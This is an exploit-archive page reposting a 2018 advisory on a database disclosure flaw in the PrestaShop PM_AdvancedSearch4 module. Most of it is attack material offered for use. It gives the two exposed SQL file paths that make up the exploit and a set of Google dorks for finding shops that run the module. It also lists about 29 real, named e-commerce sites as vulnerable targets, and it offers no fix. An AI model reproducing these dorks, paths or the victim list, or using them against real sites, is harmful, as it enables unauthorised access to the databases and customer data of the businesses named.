exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PrestaShop PM_AdvancedSearch4 1.6.1.18 Database Disclosure

PrestaShop PM_AdvancedSearch4 1.6.1.18 Database Disclosure
Posted Dec 24, 2018
Authored by KingSkrupellos

PrestaShop PM_AdvancedSearch4 module version 1.6.1.18 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | 9e08f856a55789a578098fdf3a42116817ed1fe51b458f30461325d583c4f2cc

PrestaShop PM_AdvancedSearch4 1.6.1.18 Database Disclosure

Change Mirror Download
#################################################################################################

# Exploit Title : PrestaShop PM_AdvancedSearch4 Modules 1.6.1.18 Database
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
addons.prestashop.com/fr/recherches-filtres/2778-advanced-search-4.html
+ addons.prestashop.com/es/busquedas-filtros/2778-advanced-search-4.html
+ addons.prestashop.com/en/search-filters/2778-advanced-search-4.html
# Software Price : 200 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.6.2 - 1.4.10.0 - 1.4.9.0 - 1.4.8.2 -
1.4.7.0 - 1.5.6.0 - 1.6.0.12A+- - 1.6.1.1A+- - 1.6.1.17 - 1.6.1.4 - 1.6.1.18
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_advancedsearch4/''
intext:''A(c) 2011 TS3V - Alarme-camera.fr''
intext:''cron module by samdha.net''
intext:''site realise par studio gonzo!''
intext:''A(c) 2018 A* acmotos A* Tienda online de accesorios y recambios de
moto.''
intext:''A(c) CordesExpress groupe MPROSHOP - Tous droits rA(c)servA(c)s''
intext:'' A(c) 2018 Approach Diffusion''
intext:''Piecesanspermis.fr 2018. Tous droit rA(c)servA(c)s.''
intext:''Design graphique : Regard Sur - Conception de site e-commerce :
Sarah Ligerot''
intext:''A(c) 2015-2018 - GROUPE GENIN''
intext:''2014 Advanced Power Systems All Rights Reserved'' site:shop
intext:''conception anamorphik'' site:fr
intext:''Copyright A(c) MyBeers - 2018 |CrA(c)ation Tooeasy''
intext:''Powered by Blulab'' site:pl
intext:''A(c) Design by cybervelo''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Exploit :

/modules/pm_advancedsearch4/install_base.sql

/modules/pm_advancedsearch4/install_dyn.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] unami-store.com/modules/pm_advancedsearch4/install_base.sql

[+] timeshoes.fr/modules/pm_advancedsearch4/install_base.sql

[+] zazopack.com/modules/pm_advancedsearch4/install_base.sql

[+] modelisme-vartex.com/modules/pm_advancedsearch4/install_dyn.sql

[+] interieur-expression.com/modules/pm_advancedsearch4/install_dyn.sql

[+] livingstonesgallery.com/modules/pm_advancedsearch4/install_dyn.sql

[+] lounacasa.com/modules/pm_advancedsearch4/install_dyn.sql

[+] formulapesca.com/modules/pm_advancedsearch4/install_dyn.sql

[+] acmotos.com/modules/pm_advancedsearch4/install_dyn.sql

[+] vspieces.com/modules/pm_advancedsearch4/install_dyn.sql

[+] fesea.shop/modules/pm_advancedsearch4/install_dyn.sql

[+] bikila.com/modules/pm_advancedsearch4/install_dyn.sql

[+] alsace-sports-nautiques.com/modules/pm_advancedsearch4/install_dyn.sql

[+] cordesexpress.com/modules/pm_advancedsearch4/install_dyn.sql

[+] cybervelo.com/modules/pm_advancedsearch4/install_base.sql

[+] erbolario.pl/modules/pm_advancedsearch4/install_base.sql

[+] slowfoodeditore.it/modules/pm_advancedsearch4/install_base.sql

[+] les7royaumes.com/modules/pm_advancedsearch4/install_base.sql

[+] piecesanspermis.fr/modules/pm_advancedsearch4/install_base.sql

[+] lespaniersdedavid.com/modules/pm_advancedsearch4/install_base.sql

[+] phytomedica.fr/modules/pm_advancedsearch4/install_base.sql

[+] marilashoes.com/modules/pm_advancedsearch4/install_base.sql

[+] well.fr/modules/pm_advancedsearch4/install_base.sql

[+] avecdesbijoux.fr/modules/pm_advancedsearch4/install_base.sql

[+] groupe-genin.fr/modules/pm_advancedsearch4/install_base.sql

[+] onduleur.shop/modules/pm_advancedsearch4/install_base.sql

[+] mini-auto-parts.co.uk/modules/pm_advancedsearch4/install_base.sql

[+] mybeers.fr/modules/pm_advancedsearch4/install_base.sql

[+] ventidecor.com/modules/pm_advancedsearch4/install_base.sql

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team

#################################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close